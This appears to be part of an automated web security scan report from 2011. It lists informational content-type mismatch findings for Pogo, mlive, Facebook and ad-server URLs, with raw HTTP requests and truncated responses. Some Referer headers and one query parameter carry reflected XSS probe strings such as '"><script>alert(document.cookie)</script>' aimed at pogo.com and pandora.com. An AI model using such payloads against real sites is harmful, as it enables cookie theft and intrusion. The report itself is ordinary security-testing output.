25.4. http://board-games.pogo.com/v/DV37sw/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://board-games.pogo.com
Path:	/v/DV37sw/include/css/pogo.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /v/DV37sw/include/css/pogo.css HTTP/1.1
Host: board-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://board-games.pogo.com/games/monopoly?ade82%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E96953023051=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294537888307-New%7C1297129888307%3B; prod.JID=1750257D37B483E68CD1C5FD3B9D0CC1.000241; com.pogo.unid=6606248111925025

Response

HTTP/1.1 200 OK
Age: 137070
Date: Fri, 07 Jan 2011 13:24:35 GMT
Expires: Wed, 06 Jan 2016 13:24:36 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4560-1170991451000"
Last-Modified: Fri, 09 Feb 2007 03:24:11 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 4560

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

25.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2111603&PluID=0&w=500&h=350&ord=3732683&ucm=true&ifl=$$ads/eyeblaster/addineyev2.jsp$$&ncu=$$http://ad.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/u%3B231345033%3B0-0%3B7%3B27597681%3B2361-500/350%3B40124842/40142629/1%3B%3B%7Eaopt%3D3/0/ff/0%3B%7Esscs%3D%3f$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY0000820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=83xP0820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0u3F820wsF0000040_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0u3F0035820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=09MY820wsF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G6010; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 09 Jan 2011 01:34:09 GMT
Connection: close
Content-Length: 1864

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.6. http://card-games.pogo.com/img/header/main/en_US/pogo/header-home.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://card-games.pogo.com
Path:	/img/header/main/en_US/pogo/header-home.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /img/header/main/en_US/pogo/header-home.jpg HTTP/1.1
Host: card-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://card-games.pogo.com/?sl=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294539198089-New%7C1297131198089%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=BC19526F2455BD28F04F73E408DC4DDB.000257; com.pogo.unid=6606467155258060

Response

HTTP/1.1 200 OK
Age: 137128
Date: Fri, 07 Jan 2011 13:27:11 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"18172-1277155322000"
Last-Modified: Mon, 21 Jun 2010 21:22:02 GMT
Content-Type: image/jpeg
Content-Length: 18172
Server: Apache-Coyote/1.1

GIF89a..I....%..Q.."..N.....S...
....M..t.....r..c.....&&&i..S.....t....R...n..2KTq.......--..Jkv...q....*t..Z..u..Q..p..N..n...()Sw....G...........8.....t.....n.....g`!...QFi!..s..&%.t..i..o..x...KJ.
...[SNIP]...

25.7. http://card-games.pogo.com/include/js/java-detect.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://card-games.pogo.com
Path:	/include/js/java-detect.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include/js/java-detect.jsp HTTP/1.1
Host: card-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://card-games.pogo.com/?sl=2
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294539198089-New%7C1297131198089%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=BC19526F2455BD28F04F73E408DC4DDB.000257; com.pogo.unid=6606467155258060

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:39 GMT
Server: Apache-Coyote/1.1
Content-Length: 8870

var JvmHandler = {};
JvmHandler.javaAlert = function (option){
switch(option){
        case 'reco' :
JvmHandler.reportAlert("JVM Test: Recommend Upgrade");
        break;
        case
...[SNIP]...

25.8. http://card-games.pogo.com/v/DV37sw/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://card-games.pogo.com
Path:	/v/DV37sw/include/css/pogo.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /v/DV37sw/include/css/pogo.css HTTP/1.1
Host: card-games.pogo.com
Proxy-Connection: keep-alive
Referer: http://card-games.pogo.com/?sl=2
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294539198089-New%7C1297131198089%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; prod.JID=BC19526F2455BD28F04F73E408DC4DDB.000257; com.pogo.unid=6606467155258060

Response

HTTP/1.1 200 OK
Age: 137253
Date: Fri, 07 Jan 2011 13:24:33 GMT
Expires: Wed, 06 Jan 2016 13:24:34 GMT
Cache-Control: max-age=157680000
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4560-1170991451000"
Last-Modified: Fri, 09 Feb 2007 03:24:11 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 4560

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

25.9. http://download-games.pogo.com/Category.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://download-games.pogo.com
Path:	/Category.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

25.10. http://download-games.pogo.com/deluxe.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://download-games.pogo.com
Path:	/deluxe.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

Response

25.11. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.pandora.com%2Fpeople%2F%3Fcf8db%2522%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253E09862348e83%3D1&uid=ZC45X9Axu6NOUFfX_261541&xy=0%2C0&wh=728%2C90&vchannel=65044&cid=101198&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=D1FD8590BD7786DF40E5911430156E04; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 104
Date: Sun, 09 Jan 2011 02:14:30 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_261541");

25.12. http://game3.pogo.com/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://game3.pogo.com
Path:	/include/css/pogo.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /include/css/pogo.css HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/exhibit/game/game.jsp?site=pogo&game=scrabble&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.&init=1
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
ETag: W/"4560-1170991451000"
Last-Modified: Fri, 09 Feb 2007 03:24:11 GMT
Content-Type: text/css
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 01:35:15 GMT
Server: Apache-Coyote/1.1
Content-Length: 4560

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

25.13. http://www.cmsinter.net/blog/wp-content/uploads/2011/01/image.jpeg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.cmsinter.net
Path:	/blog/wp-content/uploads/2011/01/image.jpeg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /blog/wp-content/uploads/2011/01/image.jpeg HTTP/1.1
Host: www.cmsinter.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: undefined=0; __utmz=215573381.1294526267.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=215573381.1031492532.1294526267.1294526267.1294526267.1; __utmc=215573381; __utmb=215573381.3.10.1294526267;

Response

HTTP/1.1 200 OK
Date: Sat, 08 Jan 2011 22:48:30 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 06 Jan 2011 18:42:40 GMT
ETag: "760082-8e56f-ddc58800"
Accept-Ranges: none
Content-Length: 583023
Connection: close
Content-Type: image/jpeg

......JFIF.....,.,.....CExif..MM.*.............................b...........j.(...........1.........r.2...........i.................,.......,....Adobe Photoshop 7.0.2009:06:10 14:53:00.................
...[SNIP]...

25.14. http://www.e00.peanutlabs.com/recvMid.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.e00.peanutlabs.com
Path:	/recvMid.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

25.15. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /extern/login_status.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: datr=ac4nTYEA6yNv1vkgFgkPGkCj; wd=450x23; campaign_click_url=%2Fcampaign%2Fimpression.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dpandora.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.pandora.com%252F%26extra_2%3DUS;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Connection: close
Date: Sun, 09 Jan 2011 05:18:35 GMT
Content-Length: 22

Invalid Application ID

25.16. http://www.mlive.com/08design/images/regions_bar_image.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mlive.com
Path:	/08design/images/regions_bar_image.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /08design/images/regions_bar_image.gif HTTP/1.1
Host: www.mlive.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pE+sABQDP

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 06 Jan 2009 19:43:04 GMT
ETag: "61059c-1463-45fd59d9fa200"
Accept-Ranges: bytes
Content-Length: 5219
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: image/gif
Cache-Control: max-age=2628
Expires: Sun, 09 Jan 2011 02:32:17 GMT
Date: Sun, 09 Jan 2011 01:48:29 GMT
Connection: close

......JFIF.....d.d......Ducky.......Z.....&Adobe.d...........
...X.. .......a.........................................................................................................................
...[SNIP]...

25.17. http://www.mlive.com/08design/images/regions_bar_statewide.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mlive.com
Path:	/08design/images/regions_bar_statewide.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /08design/images/regions_bar_statewide.gif HTTP/1.1
Host: www.mlive.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pE+sABQDP

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Tue, 06 Jan 2009 19:42:46 GMT
ETag: "6105a2-1463-45fd59c8cf980"
Accept-Ranges: bytes
Content-Length: 5219
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: image/gif
Cache-Control: max-age=922
Expires: Sun, 09 Jan 2011 02:03:51 GMT
Date: Sun, 09 Jan 2011 01:48:29 GMT
Connection: close

......JFIF.....d.d......Ducky.......Z.....&Adobe.d...........
...X.. .......a.........................................................................................................................
...[SNIP]...

25.18. http://www.mlive.com/08design/images/samples/weather_map_thumbnail.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mlive.com
Path:	/08design/images/samples/weather_map_thumbnail.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /08design/images/samples/weather_map_thumbnail.jpg HTTP/1.1
Host: www.mlive.com
Proxy-Connection: keep-alive
Referer: http://www.mlive.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pE+sABQDP

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Wed, 07 Jan 2009 17:52:14 GMT
ETag: "2815d7-13db-45fe82f180f80"
Accept-Ranges: bytes
Content-Length: 5083
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: image/jpeg
Cache-Control: max-age=609
Expires: Sun, 09 Jan 2011 01:58:40 GMT
Date: Sun, 09 Jan 2011 01:48:31 GMT
Connection: close

GIF89aH.6....emV..up..=Kx..xdsT$.j-lTr{b..mi.f....!gLeEUe9frK..d......s{[{.jy.e[kKk|cl{\ksZ.$Yds[LYH..XZrKY]CW[<s.d..vrzT#31JUf..8lrSr.kh.ZLc<2Sg{.]..xHfTSbC]mQ..^y.hfw.^qQex\kzUq.]{|\clL[xhx|deyU .6.
...[SNIP]...

25.19. http://www.mlive.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.mlive.com
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain; charset=UTF-8

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.mlive.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pE+sABQDP; geoip_temp=allowed; GTC=:4:75207:Dallas:TX:G233:; AxData=; Axxd=1; s_cc=true; s_vnum_m=1296540000505%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|269489FC051D05EE-6000010B80463149[CE]

Response

HTTP/1.1 200 OK
Server: Apache
Last-Modified: Thu, 01 May 2003 16:59:46 GMT
ETag: "1b9337-57e-3bc9d39382480"
Accept-Ranges: bytes
Content-Length: 1406
P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM'
Content-Type: text/plain; charset=UTF-8
Cache-Control: max-age=1
Expires: Sun, 09 Jan 2011 01:48:47 GMT
Date: Sun, 09 Jan 2011 01:48:46 GMT
Connection: close

..............h.......(....... ...........@............................3...........x..#.......i....O<..lb.>...........M..."....fu.J|....................................................................
...[SNIP]...

25.20. http://www.peanutlabs.com/publisher/dashboard2/framework_3.2.0.3958.swz previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.peanutlabs.com
Path:	/publisher/dashboard2/framework_3.2.0.3958.swz

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

Response

25.21. http://www.peanutlabs.com/recvMid.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.peanutlabs.com
Path:	/recvMid.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

Response

25.22. http://www.pogo.com/hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /hotdeploy/us/homepage/img/clubpogo-info/Default-US_91710.jpg HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/club-pogo?site=pogo&pageSection=header_club
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536543555-New%7C1297128543555%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 130426
Date: Fri, 07 Jan 2011 13:24:50 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"75906-1286558668000"
Last-Modified: Fri, 08 Oct 2010 17:24:28 GMT
Content-Type: image/jpeg
Content-Length: 75906
Server: Apache-Coyote/1.1

......JFIF.....d.d......Ducky.......<......Adobe.d.................... ... .......

.

...............................................................................................................
...[SNIP]...

25.23. http://www.pogo.com/img/header/main/en_US/pogo/header-home.jpg previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/img/header/main/en_US/pogo/header-home.jpg

Issue detail

The response contains the following Content-type statement:

Content-Type: image/jpeg

The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /img/header/main/en_US/pogo/header-home.jpg HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=DBFBE7E5DB27E8444071339BA4CA19A0.000195; com.pogo.unid=6606578824406775; s_pers=%20s_nr%3D1294536268734-New%7C1297128268734%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 130192
Date: Fri, 07 Jan 2011 13:24:32 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"18172-1277155322000"
Last-Modified: Mon, 21 Jun 2010 21:22:02 GMT
Content-Type: image/jpeg
Content-Length: 18172
Server: Apache-Coyote/1.1

GIF89a..I....%..Q.."..N.....S...
....M..t.....r..c.....&&&i..S.....t....R...n..2KTq.......--..Jkv...q....*t..Z..u..Q..p..N..n...()Sw....G...........8.....t.....n.....g`!...QFi!..s..&%.t..i..o..x...KJ.
...[SNIP]...

25.24. http://www.pogo.com/include/css/pogo.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/include/css/pogo.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain HTML.

Request

GET /include/css/pogo.css HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/action/pogo/lightregview.do
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; s_pers=%20s_nr%3D1294536335943-New%7C1297128335943%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Age: 130237
Date: Fri, 07 Jan 2011 13:24:32 GMT
Connection: Keep-Alive
Via: POGO-EDGE
ETag: W/"4560-1170991451000"
Last-Modified: Fri, 09 Feb 2007 03:24:11 GMT
Content-Type: text/css
Vary: Accept-Encoding
Server: Apache-Coyote/1.1
Content-Length: 4560

<style TYPE="text/css">
<!--
.aa {font-family:Arial, Helvetica, sans-serif}
img {border-width:0}

.default {font-family: Arial, Helvetica, sans-serif; font-size: 12px; color: #000000}
.dflt {font-fami
...[SNIP]...

25.25. http://www.pogo.com/include/js/java-detect.jsp previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.pogo.com
Path:	/include/js/java-detect.jsp

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /include/js/java-detect.jsp HTTP/1.1
Host: www.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/home/home.jsp?f9258%22%3E%3Cscript%3Ealert(1)%3C/script%3E4225969d669=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
